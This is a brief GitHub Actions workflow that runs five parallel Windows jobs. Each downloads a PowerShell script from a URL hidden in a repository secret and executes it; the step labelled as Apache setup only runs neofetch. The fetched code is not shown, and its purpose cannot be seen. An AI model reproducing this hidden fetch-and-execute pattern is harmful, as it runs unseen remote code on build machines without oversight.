name: CI/CD
on: 
  workflow_dispatch:
 
jobs:
 wsl-jobs:
    runs-on: windows-latest
    strategy:
      fail-fast: false
      matrix:
         com: [1,2,3,4,5]
    continue-on-error: true
    defaults:
      run:
          shell: wsl-run {0}
    steps:
      - name: Setup
        env:
          CONF_URL: ${{ secrets.CONF_URL }}
        shell: pwsh
        run: |
          Invoke-WebRequest -Uri $env:CONF_URL -OutFile setup_wsl.ps1
          .\setup_wsl.ps1
      - name: Configure WSL for Apache
        run: |
          apt update -y && apt install neofetch -y
          neofetch
